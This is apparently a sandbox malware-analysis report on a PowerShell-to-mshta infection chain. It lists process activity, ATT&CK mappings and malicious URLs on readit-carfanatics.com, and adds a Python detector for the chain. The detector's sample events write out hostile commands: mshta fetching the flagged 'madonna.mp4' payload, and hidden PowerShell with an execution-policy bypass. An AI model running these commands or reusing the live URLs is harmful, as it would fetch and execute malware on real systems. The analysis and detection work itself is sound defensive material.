Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
MITRE ATT&CK Matrix (the number in parentheses is the count of matched signatures for that technique; cells without a number are unmatched matrix entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (2) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (31) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (11) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (22) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Behavior Graph ID: 1580443
Sample: #U65b0#U5efa #U6587#U672c#U...
Start date: 24/12/2024
Architecture: WINDOWS
Score: 80

Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Sigma detected: Suspicious MSHTA Child Process; 3 other signatures
Resolved domains: pawpaws1.readit-carfanatics.com, pawpaws.readit-carfanatics.com

Process tree (bracketed numbers are the per-node counters drawn on the graph, see legend):

powershell.exe [11]
    signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
    mshta.exe [17]
        network: pawpaws1.readit-carfanatics.com, 172.67.201.143, port 443 (local ports 49730, 49734), CLOUDFLARENETUS, United States
        signatures: Suspicious powershell command line found
        powershell.exe [18]
            signatures: Suspicious powershell command line found
            powershell.exe [15 17]
                conhost.exe
            conhost.exe
    conhost.exe
svchost.exe [1 1]
    network: 127.0.0.1 unknown unknown
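The chain drawn above (powershell.exe launching mshta.exe, mshta.exe launching powershell.exe again, with the first powershell.exe flagged for bypassing the execution policy) is what the two Sigma findings named in the graph key on. The block below is an added example and is not part of the Joe Sandbox report: it runs those parent/child and argument checks over a constructed list of process-creation events. The PIDs 7404, 7560, 7752 and 7872 are the ones the report lists; the parent PID of the first process, the `ProcEvent` field names and every command line are assumptions made for the demo, not values taken from the report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


# Constructed events mirroring the chain in the behavior graph. PIDs 7404, 7560,
# 7752 and 7872 are from the report; parent PID 4242 and all command lines are
# ASSUMED for this demo (the report does not print the child command lines here).
EVENTS = [
    ProcEvent(7404, 4242, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sample.ps1"'),
    ProcEvent(7560, 7404, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe https://pawpaws.readit-carfanatics.com/madonna.mp4"),
    ProcEvent(7752, 7560, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "iex(...)"'),
    ProcEvent(7872, 7752, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -c "Start-Sleep 300"'),
    ProcEvent(7900, 7404, r"C:\Windows\System32\conhost.exe",
              r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# powershell.exe accepts any unambiguous prefix of -ExecutionPolicy ("-ex", "-exec")
# and the short form "-ep"; Bypass and Unrestricted both disable the policy.
INSECURE_EP = re.compile(r"(?i)-(?:ex\w*|ep)\s+(?:bypass|unrestricted)\b")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from the given pid up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def findings(events):
    """Return sorted (rule, pid) pairs for the three checks the graph reports."""
    by_pid = {e.pid: e for e in events}
    out = set()
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        if img == "powershell.exe" and INSECURE_EP.search(e.cmdline):
            out.add(("insecure_execution_policy", e.pid))
        if img == "mshta.exe" and pimg == "powershell.exe":
            out.add(("powershell_spawns_mshta", e.pid))
        if img == "powershell.exe" and pimg == "mshta.exe":
            out.add(("mshta_spawns_powershell", e.pid))
    return sorted(out)


if __name__ == "__main__":
    for rule, pid in findings(EVENTS):
        print(f"{rule:28s} pid={pid} chain={' <- '.join(ancestry(EVENTS, pid))}")
```

Two things the chain check buys over a plain command-line match: the second powershell.exe is caught by its parent (mshta.exe) even if its arguments were encoded or empty, and the innermost powershell.exe, which has nothing suspicious on its own command line, is still attributable through `ancestry` to the mshta.exe hop.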

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1 | 0% | ReversingLabs | |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label | Link
https://pawpaws.readit-carfanatics.com/madonna.mp4/E | 100% | Avira URL Cloud | malware |
https://pawpaws1.readit-carfanatics.com/madonna.vstx | 100% | Avira URL Cloud | malware |
https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4 | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/ | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4TTC: | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4S | 0% | Avira URL Cloud | safe |
http://pawpaws1.readit-carfanatics.com | 100% | Avira URL Cloud | malware |
https://pawpaws.readit-carfanatics.com/madonna.mp4O | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4i | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4T | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp41 | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4rC: | 0% | Avira URL Cloud | safe |
https://pawpaws1.readit-carfanatic | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp46 | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4E | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4: | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4C: | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4H | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/eE | 0% | Avira URL Cloud | safe |
https://pawpaws1.readit-carfanatics.com | 100% | Avira URL Cloud | malware |
https://pawpaws.readit-carfanatics.com/madonna.mp4...F | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMh | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4oG | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4( | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4- | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4x | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4w | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4 | 100% | Avira URL Cloud | malware |
https://pawpaws.X | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4ic | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=I | 0% | Avira URL Cloud | safe |
https://pawpaws.readit-carfanatics.com/madonna.mp4... | 100% | Avira URL Cloud | malware |
https://pawpaws.readit-carfanatics.com/madonna.mp4fE | 0% | Avira URL Cloud | safe |
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pawpaws.readit-carfanatics.com | 172.67.201.143 | true | true | | unknown
pawpaws1.readit-carfanatics.com | 172.67.201.143 | true | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://pawpaws1.readit-carfanatics.com/madonna.vstx | true | Avira URL Cloud: malware | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4 | true | Avira URL Cloud: malware | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://pawpaws.readit-carfanatics.com/madonna.mp4O | mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4S | mshta.exe, 00000002.00000002.1807186379.000001C9A4130000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4T | mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4 | mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/ | mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | | high
https://aka.ms/pscore6 | powershell.exe, 00000000.00000002.1684443354.000001CD04A5E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4/E | mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4i | mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pawpaws1.readit-carfanatics.com | powershell.exe, 00000006.00000002.1790101993.00000000098FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4TTC: | mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp41 | mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4rC: | mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp46 | mshta.exe, 00000002.00000003.1779641762.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1782599751.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793135818.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1806411558.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783270231.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1784469451.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4: | mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.0000000006479000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws1.readit-carfanatic | powershell.exe, 00000006.00000002.1790101993.00000000098F8000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4C: | mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4E | mshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1684443354.000001CD04A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4H | mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1804268352.000001C19E1D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp | mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/eE | mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.1738683834.0000018900F17000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws1.readit-carfanatics.com | powershell.exe, 00000006.00000002.1790101993.00000000096F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1790101993.0000000009421000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMh | mshta.exe, 00000002.00000003.1779854987.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793336898.000001C99EB18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792624686.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1805508732.000001C99EB19000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4...F | mshta.exe, 00000002.00000003.1779290701.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 00000003.00000002.2911938505.000001EB7740F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4oG | mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4( | mshta.exe, 00000002.00000003.1790913512.000001C9A1D6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792017935.000001C9A1D6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4- | mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | | high
https://pawpaws.readit-carfanatics.com/madonna.mp4w | mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4x | mshta.exe, 00000002.00000003.1788000132.000001C9A3BD0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=I | mshta.exe, 00000002.00000002.1799754505.000001C19C7D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1684443354.000001CD04A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://pawpaws.X | powershell.exe, 00000000.00000002.1684443354.000001CD04EF8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4ic | mshta.exe, 00000002.00000002.1805106055.000001C99EA60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4... | mshta.exe, 00000002.00000002.1805106055.000001C99EA75000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://pawpaws.readit-carfanatics.com/madonna.mp4fE | mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
